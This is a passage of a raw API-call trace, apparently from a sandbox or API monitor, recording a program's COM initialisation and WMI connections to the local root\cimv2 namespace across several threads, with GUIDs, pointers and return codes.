Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4f4f6c0 | out: ppvObject=0x4f4f6c0*=0x547fc8) returned 0x0 [0158.033] WbemLocator:IUnknown:QueryInterface (in: This=0x57d6e0, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4f4f6ac | out: ppvObject=0x4f4f6ac*=0x547fa4) returned 0x0 [0158.034] WbemLocator:IClientSecurity:SetBlanket (This=0x547fa4, pProxy=0x57d6e0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0158.034] WbemLocator:IUnknown:Release (This=0x547fa4) returned 0x2 [0158.034] WbemLocator:IUnknown:Release (This=0x547fc8) returned 0x1 [0158.034] CoTaskMemFree (pv=0x598a98) [0158.034] WbemLocator:IUnknown:Release (This=0x596c58) returned 0x0 [0158.034] WbemLocator:IUnknown:QueryInterface (in: This=0x57d6e0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4f4f2bc | out: ppvObject=0x4f4f2bc*=0x547fc8) returned 0x0 [0158.034] WbemLocator:IUnknown:QueryInterface (in: This=0x547fc8, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x4f4f278 | out: ppvObject=0x4f4f278*=0x0) returned 0x80004002 [0158.035] WbemLocator:IUnknown:QueryInterface (in: This=0x547fc8, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x4f4f094 | out: ppvObject=0x4f4f094*=0x0) returned 0x80004002 [0158.035] WbemLocator:IUnknown:QueryInterface (in: This=0x57d6e0, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x4f4ee6c | out: ppvObject=0x4f4ee6c*=0x0) returned 0x80004002 [0158.036] WbemLocator:IUnknown:AddRef (This=0x547fc8) returned 0x3 [0158.036] WbemLocator:IUnknown:QueryInterface (in: This=0x547fc8, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x4f4ebcc | out: ppvObject=0x4f4ebcc*=0x0) returned 0x80004002 [0158.036] WbemLocator:IUnknown:QueryInterface (in: This=0x547fc8, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x4f4eb7c | out: ppvObject=0x4f4eb7c*=0x0) returned 0x80004002 [0158.036] WbemLocator:IUnknown:QueryInterface (in: This=0x547fc8, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4f4eb88 | out: ppvObject=0x4f4eb88*=0x547f24) returned 0x0 [0158.037] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x547f24, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x4f4eb90 | out: pCid=0x4f4eb90*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0158.037] WbemLocator:IUnknown:Release (This=0x547f24) returned 0x3 [0158.037] CoGetContextToken (in: pToken=0x4f4ebe8 | out: pToken=0x4f4ebe8) returned 0x0 [0158.037] CoGetContextToken (in: pToken=0x4f4eff0 | out: pToken=0x4f4eff0) returned 0x0 [0158.037] WbemLocator:IUnknown:QueryInterface (in: This=0x547fc8, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4f4f07c | out: ppvObject=0x4f4f07c*=0x547fac) returned 0x0 [0158.037] WbemLocator:IRpcOptions:Query (in: This=0x547fac, pPrx=0x547fc8, dwProperty=2, pdwValue=0x4f4f088 | out: pdwValue=0x4f4f088) returned 0x80004002 [0158.037] WbemLocator:IUnknown:Release (This=0x547fac) returned 0x3 [0158.037] WbemLocator:IUnknown:Release (This=0x547fc8) returned 0x2 [0158.037] CoGetContextToken (in: pToken=0x4f4f5d0 | out: pToken=0x4f4f5d0) returned 0x0 [0158.037] CoGetContextToken (in: pToken=0x4f4f530 | out: pToken=0x4f4f530) returned 0x0 [0158.037] WbemLocator:IUnknown:QueryInterface (in: This=0x547fc8, riid=0x4f4f600*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x4f4f5fc | out: ppvObject=0x4f4f5fc*=0x57d6e0) returned 0x0 [0158.037] WbemLocator:IUnknown:AddRef (This=0x57d6e0) returned 0x4 [0158.038] WbemLocator:IUnknown:Release (This=0x57d6e0) returned 0x3 [0158.038] WbemLocator:IUnknown:Release (This=0x57d6e0) returned 0x2 [0158.045] SysStringLen (param_1=0x0) returned 0x0 [0158.047] CoUninitialize () Thread: id = 165 os_tid = 0x11d0 [0158.058] CoGetContextToken (in: pToken=0x4f4f26c | out: pToken=0x4f4f26c) returned 0x0 [0158.058] CoGetContextToken (in: pToken=0x4f4f25c | out: pToken=0x4f4f25c) returned 0x0 [0158.059] CoGetMarshalSizeMax (in: pulSize=0x4f4f218, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x547fc8, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0 | out: pulSize=0x4f4f218) returned 0x0 [0158.061] CoMarshalInterface (pStm=0x580780, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x547fc8, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 [0178.138] CoGetContextToken (in: pToken=0x4f4f26c | out: pToken=0x4f4f26c) returned 0x0 [0178.138] CoGetContextToken (in: pToken=0x4f4f25c | out: pToken=0x4f4f25c) returned 0x0 [0178.138] CoGetMarshalSizeMax (in: pulSize=0x4f4f218, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x546fc8, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0 | out: pulSize=0x4f4f218) returned 0x0 [0178.139] CoMarshalInterface (pStm=0x580980, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x546fc8, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 [0184.373] CoGetContextToken (in: pToken=0x4f4f26c | out: pToken=0x4f4f26c) returned 0x0 [0184.373] CoGetContextToken (in: pToken=0x4f4f25c | out: pToken=0x4f4f25c) returned 0x0 [0184.373] CoGetMarshalSizeMax (in: pulSize=0x4f4f218, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x5afb30, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0 | out: pulSize=0x4f4f218) returned 0x0 [0184.374] CoMarshalInterface (pStm=0x580800, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x5afb30, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 [0184.567] CoGetContextToken (in: pToken=0x4f4f26c | out: pToken=0x4f4f26c) returned 0x0 [0184.567] CoGetContextToken (in: pToken=0x4f4f25c | out: pToken=0x4f4f25c) returned 0x0 [0184.567] CoGetMarshalSizeMax (in: pulSize=0x4f4f218, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x5afc30, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0 | out: pulSize=0x4f4f218) returned 0x0 [0184.567] CoMarshalInterface (pStm=0x580940, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x5afc30, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 [0186.483] CoGetContextToken (in: pToken=0x4f4f26c | out: pToken=0x4f4f26c) returned 0x0 [0186.483] CoGetContextToken (in: pToken=0x4f4f25c | out: pToken=0x4f4f25c) returned 0x0 [0186.483] CoGetMarshalSizeMax (in: pulSize=0x4f4f218, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x5afd30, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0 | out: pulSize=0x4f4f218) returned 0x0 [0186.483] CoMarshalInterface (pStm=0x580580, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x5afd30, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 [0245.833] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0x4f4fc64 | out: pperrinfo=0x4f4fc64*=0x0) returned 0x1 Thread: id = 167 os_tid = 0x122c [0178.090] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0178.090] RoInitialize () returned 0x1 [0178.090] RoUninitialize () returned 0x0 [0178.091] CoGetClassObject (in: rclsid=0x588014*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x694f4d80*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x508f480 | out: ppv=0x508f480*=0x5acdf0) returned 0x0 [0178.091] WbemLocator:IUnknown:QueryInterface (in: This=0x5acdf0, riid=0x694d79fc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x508f69c | out: ppvObject=0x508f69c*=0x0) returned 0x80004002 [0178.091] WbemLocator:IClassFactory:CreateInstance (in: This=0x5acdf0, pUnkOuter=0x0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x508f6a8 | out: ppvObject=0x508f6a8*=0x596d08) returned 0x0 [0178.092] WbemLocator:IUnknown:Release (This=0x5acdf0) returned 0x0 [0178.092] WbemLocator:IUnknown:QueryInterface (in: This=0x596d08, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x508f2cc | out: ppvObject=0x508f2cc*=0x596d08) returned 0x0 [0178.092] WbemLocator:IUnknown:QueryInterface (in: This=0x596d08, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x508f288 | out: ppvObject=0x508f288*=0x0) returned 0x80004002 [0178.092] WbemLocator:IUnknown:QueryInterface (in: This=0x596d08, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x508ee7c | out: ppvObject=0x508ee7c*=0x0) returned 0x80004002 [0178.092] WbemLocator:IUnknown:AddRef (This=0x596d08) returned 0x3 [0178.092] WbemLocator:IUnknown:QueryInterface (in: This=0x596d08, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x508ebdc | out: ppvObject=0x508ebdc*=0x0) returned 0x80004002 [0178.092] WbemLocator:IUnknown:QueryInterface (in: This=0x596d08, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x508eb8c | out: ppvObject=0x508eb8c*=0x0) returned 0x80004002 [0178.092] WbemLocator:IUnknown:QueryInterface (in: This=0x596d08, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x508eb98 | out: ppvObject=0x508eb98*=0x0) returned 0x80004002 [0178.092] CoGetContextToken (in: pToken=0x508ebf8 | out: pToken=0x508ebf8) returned 0x0 [0178.093] CoGetContextToken (in: pToken=0x508f000 | out: pToken=0x508f000) returned 0x0 [0178.093] WbemLocator:IUnknown:QueryInterface (in: This=0x596d08, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x508f08c | out: ppvObject=0x508f08c*=0x0) returned 0x80004002 [0178.093] WbemLocator:IUnknown:Release (This=0x596d08) returned 0x2 [0178.093] WbemLocator:IUnknown:Release (This=0x596d08) returned 0x1 [0178.093] CoGetContextToken (in: pToken=0x508f688 | out: pToken=0x508f688) returned 0x0 [0178.093] CoGetContextToken (in: pToken=0x508f5e8 | out: pToken=0x508f5e8) returned 0x0 [0178.093] WbemLocator:IUnknown:QueryInterface (in: This=0x596d08, riid=0x508f6b8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x508f6b4 | out: ppvObject=0x508f6b4*=0x596d08) returned 0x0 [0178.093] WbemLocator:IUnknown:AddRef (This=0x596d08) returned 0x3 [0178.093] WbemLocator:IUnknown:Release (This=0x596d08) returned 0x2 [0178.094] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594200, puCount=0x508f84c | out: puCount=0x508f84c*=0x2) returned 0x0 [0178.094] WbemDefPath:IWbemPath:GetText (in: This=0x594200, lFlags=8, puBuffLength=0x508f848*=0x0, pszText=0x0 | out: puBuffLength=0x508f848*=0xf, pszText=0x0) returned 0x0 [0178.094] WbemDefPath:IWbemPath:GetText (in: This=0x594200, lFlags=8, puBuffLength=0x508f848*=0xf, pszText="00000000000000" | out: puBuffLength=0x508f848*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0178.094] CoCreateInstance (in: rclsid=0x65a613b4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x65a61414*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x508f724 | out: ppv=0x508f724*=0x596db8) returned 0x0 [0178.094] WbemLocator:IWbemLocator:ConnectServer (in: This=0x596db8, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x508f7b8 | out: ppNamespace=0x508f7b8*=0x57d410) returned 0x0 [0178.121] WbemLocator:IUnknown:QueryInterface (in: This=0x57d410, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x508f64c | out: ppvObject=0x508f64c*=0x546fa4) returned 0x0 [0178.121] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x546fa4, pProxy=0x57d410, pAuthnSvc=0x508f69c, pAuthzSvc=0x508f698, pServerPrincName=0x508f690, pAuthnLevel=0x508f694, pImpLevel=0x508f684, pAuthInfo=0x508f688, pCapabilites=0x508f68c | out: pAuthnSvc=0x508f69c*=0xa, pAuthzSvc=0x508f698*=0x0, pServerPrincName=0x508f690, pAuthnLevel=0x508f694*=0x6, pImpLevel=0x508f684*=0x2, pAuthInfo=0x508f688, pCapabilites=0x508f68c*=0x1) returned 0x0 [0178.121] WbemLocator:IUnknown:Release (This=0x546fa4) returned 0x1 [0178.121] WbemLocator:IUnknown:QueryInterface (in: This=0x57d410, riid=0x65a61224*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x508f640 | out: ppvObject=0x508f640*=0x546fc8) returned 0x0 [0178.121] WbemLocator:IUnknown:QueryInterface (in: This=0x57d410, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x508f62c | out: ppvObject=0x508f62c*=0x546fa4) returned 0x0 [0178.121] WbemLocator:IClientSecurity:SetBlanket (This=0x546fa4, pProxy=0x57d410, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0178.122] WbemLocator:IUnknown:Release (This=0x546fa4) returned 0x2 [0178.122] WbemLocator:IUnknown:Release (This=0x546fc8) returned 0x1 [0178.122] CoTaskMemFree (pv=0x5988b8) [0178.122] WbemLocator:IUnknown:Release (This=0x596db8) returned 0x0 [0178.122] WbemLocator:IUnknown:QueryInterface (in: This=0x57d410, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x508f23c | out: ppvObject=0x508f23c*=0x546fc8) returned 0x0 [0178.122] WbemLocator:IUnknown:QueryInterface (in: This=0x546fc8, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x508f1f8 | out: ppvObject=0x508f1f8*=0x0) returned 0x80004002 [0178.123] WbemLocator:IUnknown:QueryInterface (in: This=0x546fc8, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x508f014 | out: ppvObject=0x508f014*=0x0) returned 0x80004002 [0178.123] WbemLocator:IUnknown:QueryInterface (in: This=0x57d410, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x508edec | out: ppvObject=0x508edec*=0x0) returned 0x80004002 [0178.124] WbemLocator:IUnknown:AddRef (This=0x546fc8) returned 0x3 [0178.124] WbemLocator:IUnknown:QueryInterface (in: This=0x546fc8, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x508eb4c | out: ppvObject=0x508eb4c*=0x0) returned 0x80004002 [0178.124] WbemLocator:IUnknown:QueryInterface (in: This=0x546fc8, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x508eafc | out: ppvObject=0x508eafc*=0x0) returned 0x80004002 [0178.124] WbemLocator:IUnknown:QueryInterface (in: This=0x546fc8, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x508eb08 | out: ppvObject=0x508eb08*=0x546f24) returned 0x0 [0178.124] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x546f24, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x508eb10 | out: pCid=0x508eb10*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0178.124] WbemLocator:IUnknown:Release (This=0x546f24) returned 0x3 [0178.124] CoGetContextToken (in: pToken=0x508eb68 | out: pToken=0x508eb68) returned 0x0 [0178.125] CoGetContextToken (in: pToken=0x508ef70 | out: pToken=0x508ef70) returned 0x0 [0178.125] WbemLocator:IUnknown:QueryInterface (in: This=0x546fc8, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x508effc | out: ppvObject=0x508effc*=0x546fac) returned 0x0 [0178.125] WbemLocator:IRpcOptions:Query (in: This=0x546fac, pPrx=0x546fc8, dwProperty=2, pdwValue=0x508f008 | out: pdwValue=0x508f008) returned 0x80004002 [0178.125] WbemLocator:IUnknown:Release (This=0x546fac) returned 0x3 [0178.125] WbemLocator:IUnknown:Release (This=0x546fc8) returned 0x2 [0178.125] CoGetContextToken (in: pToken=0x508f550 | out: pToken=0x508f550) returned 0x0 [0178.125] CoGetContextToken (in: pToken=0x508f4b0 | out: pToken=0x508f4b0) returned 0x0 [0178.125] WbemLocator:IUnknown:QueryInterface (in: This=0x546fc8, riid=0x508f580*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x508f57c | out: ppvObject=0x508f57c*=0x57d410) returned 0x0 [0178.125] WbemLocator:IUnknown:AddRef (This=0x57d410) returned 0x4 [0178.125] WbemLocator:IUnknown:Release (This=0x57d410) returned 0x3 [0178.125] WbemLocator:IUnknown:Release (This=0x57d410) returned 0x2 [0178.125] SysStringLen (param_1=0x0) returned 0x0 [0178.126] CoUninitialize () Thread: id = 171 os_tid = 0x1110 [0179.036] CoGetContextToken (in: pToken=0x4fcfebc | out: pToken=0x4fcfebc) returned 0x0 [0179.036] IUnknown:QueryInterface (in: This=0x524148, riid=0x694738a4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4fcfee0 | out: ppvObject=0x4fcfee0*=0x524154) returned 0x0 [0179.070] IComThreadingInfo:GetCurrentThreadType (in: This=0x524154, pThreadType=0x4fcff0c | out: pThreadType=0x4fcff0c*=0) returned 0x0 [0179.070] IUnknown:Release (This=0x524154) returned 0x1 [0179.070] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0179.070] RoInitialize () returned 0x1 [0179.071] RoUninitialize () returned 0x0 Thread: id = 172 os_tid = 0x10f8 [0179.283] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0179.284] CoGetContextToken (in: pToken=0x510fbc4 | out: pToken=0x510fbc4) returned 0x0 [0179.284] IUnknown:QueryInterface (in: This=0x524148, riid=0x694738a4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x510fbe8 | out: ppvObject=0x510fbe8*=0x524154) returned 0x0 [0179.285] IComThreadingInfo:GetCurrentThreadType (in: This=0x524154, pThreadType=0x510fc14 | out: pThreadType=0x510fc14*=0) returned 0x0 [0179.285] IUnknown:Release (This=0x524154) returned 0x1 [0179.285] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0179.285] CoUninitialize () [0179.285] RoInitialize () returned 0x1 [0179.285] RoUninitialize () returned 0x0 [0179.285] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x510f8c8 | out: UnbiasedTime=0x510f8c8) returned 1 [0179.285] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x510f8b8 | out: UnbiasedTime=0x510f8b8) returned 1 [0200.389] CoUninitialize () Thread: id = 173 os_tid = 0x10f0 Thread: id = 174 os_tid = 0x1284 [0184.323] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0184.323] RoInitialize () returned 0x1 [0184.323] RoUninitialize () returned 0x0 [0184.324] CoGetClassObject (in: rclsid=0x588014*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x694f4d80*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x545f380 | out: ppv=0x545f380*=0x5cd2b8) returned 0x0 [0184.324] WbemLocator:IUnknown:QueryInterface (in: This=0x5cd2b8, riid=0x694d79fc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x545f59c | out: ppvObject=0x545f59c*=0x0) returned 0x80004002 [0184.324] WbemLocator:IClassFactory:CreateInstance (in: This=0x5cd2b8, pUnkOuter=0x0, riid=0x693ade2c*(Data1=0x0, 